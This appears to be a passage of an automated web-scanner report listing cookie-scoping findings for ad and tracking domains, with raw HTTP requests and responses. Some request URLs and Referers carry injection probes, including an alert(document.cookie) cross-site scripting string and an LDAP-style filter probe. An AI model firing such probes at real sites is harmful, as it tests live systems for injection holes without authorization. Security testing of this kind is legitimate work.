HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:18:22 GMT Server: Apache Set-Cookie: SESS98684d1eb89eae890ac2d30814f7062d=3na39ksk8u091m5b71vntg50k3; expires=Tue, 22-Feb-2011 06:51:42 GMT; path=/; domain=.popsci.com Last-Modified: Sun, 30 Jan 2011 03:17:46 GMT Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Vary: Accept-Encoding,User-Agent X-Server-Name: web4b D=17304 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 HTTP/1.1 Host: www.walmart.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <head> <title> - Walmart</title> <link href="http://i2.walmartimages.com/css/global.css" rel="stylesheet" typ ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.zacks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 23:41:33 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ad/N3973.MSN/B4412732.227;sz=1x1;ord=1362758608? HTTP/1.1 Accept: */* Referer: http://www.redacted/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: ad.doubleclick.net Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Date: Sat, 29 Jan 2011 23:26:33 GMT Location: http://s0.2mdn.net/viewad/1150992/54-1x1.gif Cache-Control: no-cache Pragma: no-cache Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 23:41:33 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Server: GFE/2.0 Content-Type: text/html
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
id=c883d90320000a3||t=1296407519|et=730|cs=2n6_cukr; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 17:11:59 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 17:11:59 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 345 Set-Cookie: id=c883d90320000a3||t=1296407519|et=730|cs=2n6_cukr; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 17:11:59 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 17:11:59 GMT Cache-Control: no-cache Pragma: no-cache Date: Sun, 30 Jan 2011 17:11:59 GMT Expires: Sun, 30 Jan 2011 17:11:59 GMT Discarded: true Connection: close
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
id=c85508a32000084|685973/957280/15004|t=1296353092|et=730|cs=l6z5ub1z; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 02:04:52 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 02:04:52 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /click;h=v8/3a9f/7/0/*/q;234336715;1-0;0;57860936;4307-300/250;40005125/40022912/1;;~okv=;pc=[TPAS_ID];;~sscs=?http:/specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; test_cookie=CheckForPermission;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch Set-Cookie: id=c85508a32000084|685973/957280/15004|t=1296353092|et=730|cs=l6z5ub1z; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 02:04:52 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 02:04:52 GMT Date: Sun, 30 Jan 2011 02:04:52 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The following cookies were issued by the application and is scoped to a parent of the issuing domain:
id=c8a488932000097|737194/848412/15003|t=1296344711|et=730|cs=pupuuvqs; path=/; domain=.doubleclick.net; expires=Mon, 28 Jan 2013 23:45:11 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 28 Jan 2011 23:45:11 GMT
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /clk;235581983;52388360;s HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: test_cookie=CheckForPermission;
Response
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://weeklyad.staples.com/staples/new_user_entry.aspx?mode=flash&sneakpeek=y&cm_mmc=display_ads-_-WeeklyAd-_-WeeklyAd-_-MSN&cid=BAN:RETAIL:MSN:MSN:WEEKLYAD:20101201:WEEKLYADSNEAKPEEK:VARIOUS:N Set-Cookie: id=c8a488932000097|737194/848412/15003|t=1296344711|et=730|cs=pupuuvqs; path=/; domain=.doubleclick.net; expires=Mon, 28 Jan 2013 23:45:11 GMT P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 28 Jan 2011 23:45:11 GMT Date: Sat, 29 Jan 2011 23:45:11 GMT Server: GFE/2.0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308 HTTP/1.1 Host: ad.wsod.com Proxy-Connection: keep-alive Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2|33:353:516:3:0:38345:1296350886:L
Response
HTTP/1.1 302 Found Server: nginx/0.6.39 Date: Sun, 30 Jan 2011 13:00:21 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.1.6 Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 13:00:21 GMT; path=/ Set-Cookie: fp=599362::7:IN:::1296392421:1:33; expires=Sat, 30-Apr-2011 13:00:21 GMT; path=/; domain=.wsod.com Set-Cookie: i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2; expires=Tue, 01-Mar-2011 13:00:21 GMT; path=/ Location: http://admedia.wsod.com/media/p.gif P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Length: 0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rss HTTP/1.1 Host: add.my.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 30 Jan 2011 01:21:50 GMT Set-Cookie: B=49rk3tt6k9f9e&b=3&s=sq; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=iso-8859-1 Cache-Control: private Content-Length: 3312
<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head><title>Yahoo! - 404 Not Found</title><style> /* nn4 hide */ /*/*/ body {font:small/1.2em arial,h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA" Cache-Control: no-cache Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver Set-Cookie: rsi_us_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; Domain=.revsci.net; Expires=Thu, 22-Jan-2043 01:29:45 GMT; Path=/ Content-Type: application/x-javascript;charset=ISO-8859-1 Vary: Accept-Encoding Date: Sun, 30 Jan 2011 01:29:44 GMT Content-Length: 541
function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;} i.src=u;p[p.length]=i;}} function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: alex-johnson.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:04:23 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=71247d98d365d957459ad2146ae86d57; expires=Sat, 25-Jan-2031 02:04:23 GMT; path=/; domain=.newsvine.com Content-Length: 0 Content-Type: text/html Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adsc/d775684/10/38973908/decide.php HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /adsc/d852149/4/40142779/decide.php?ord=1296350847 HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3740.MSN/B5123509.8;sz=300x250;siteid=msn;pc=[TPAS_ID];dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003O/53000000000034172.1?!&&PID=8108870&UIT=G&TargetID=20624992&AN=304826910&PG=INVIHR&ASID=526d9cac631c46728d1cd271a57cd5b5&destination=;ord=304826910? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: LP=1296062048; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1296351006.909,wait-%3E10000,&1296351005834 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_G=method->-1,ts->1296351006; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 30 Jan 2011 01:30:07 GMT Content-Type: image/gif Connection: close Vary: Accept-Encoding Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1296351006%2E909%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com; Content-length: 42 P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bmx3/broker.pli?pid=p85001580&PRAd=58087454&AR_C=40401740 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=38&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Jan 29 23:04:15 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 30 Jan 2011 01:30:06 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; expires=Sat 30-Apr-2011 01:30:06 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296351006; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 26496
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/news.aspx HTTP/1.1 Host: articles.moneycentral.msn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:05:33 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA43 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=a9c5053b2f704163858001bde4170892; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=FDEFD5726B4F41F2A069537932EBC97A; domain=.moneycentral.msn.com; expires=Thu, 18-Aug-2011 02:05:33 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 39029
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: athima-chansanchai.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:04:32 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=604df4063ca91afa132a73bbd94df4dd; expires=Sat, 25-Jan-2031 02:04:32 GMT; path=/; domain=.newsvine.com Content-Length: 0 Content-Type: text/html Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?rn=1296343586482&c7=http%3A%2F%2Fwww.redacted%2F&c1=2&c2=3000001 HTTP/1.1 Accept: */* Referer: http://www.redacted/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: b.scorecardresearch.com Proxy-Connection: Keep-Alive Cookie: UID=5d4473db-24.143.206.162-1293844712
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Sat, 29 Jan 2011 23:26:31 GMT Connection: close Set-Cookie: UID=5d4473db-24.143.206.162-1293844712; expires=Mon, 28-Jan-2013 23:26:31 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /r?c2=3000001&d.c=gif&d.o=msnbcom&d.x=212602874&d.t=page&d.u=http%3A%2F%2Fphotoblog.msnbc.msn.com%2F_news%2F2011%2F01%2Fad5b7d32bfbc5f43%29%28sn%3D*%2F5942494-double-whammy-on-the-sun%3Fgt1%3D43001&d.r=http%3A%2F%2Fburp%2Fshow%2F3 HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://photoblog.msnbc.redacted/_news/2011/01/ad5b7d32bfbc5f43)(sn=*/5942494-double-whammy-on-the-sun?gt1=43001 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 200 OK Content-Length: 43 Content-Type: image/gif Date: Sun, 30 Jan 2011 01:19:41 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Tue, 29-Jan-2013 01:19:41 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=4&c2=p85001580&c3=58087454&c4=40401740&c5=1&c6=39&c7=wed%20jan%2026%2020%3A14%3A29%202011&c8=http%3A%2F%2Fad.doubleclick.net%2Fadi%2FN3867.270604.B3%2FB5128597.7%3Bsz%3D728x90%3Bclick0%3Dhttp%3A%2F%2Fr1-ads.ace.advertising.com%2Fclick%2Fsite%3D0000730461%2Fmnum%3D0000950192%2Fcstr%3D12110217%3D_4d44bf07%2C6566708061%2C730461_950192_1183_0%2C1_%2Fxsxdata%3D%24XSXDATA%2Fbnum%3D12110217%2Foptn%3D64%3Ftrg%3Dhttp%3A%2F%2Fb3.mookie1.com%2FRealMedia%2Fads%2Fclick_lx.ads%2FAOLB3%2FRadioShack%2FSELL_2011Q1%2FCPA%2F728%2FL36%2F860849269%2Fx90%2FUSNetwork%2FRS_SELL_2011Q1_AOL_CPA_728%2FRadioShack_SELL_2011Q1.html%2F72634857383030695a694d41416f6366%3F%3Bord%3D860849269%3F&c9=Advertisement&c10=http%3A%2F%2Fmsn.whitepages.com%2F&c15=&1296351004927 HTTP/1.1 Host: b.voicefive.com Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.7;sz=728x90;click0=http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/728/L36/860849269/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=860849269? Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; UID=1d29d89e-72.246.30.75-1294456810; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&; BMX_G=method->-1,ts->1296351006; BMX_3PC=1
Response
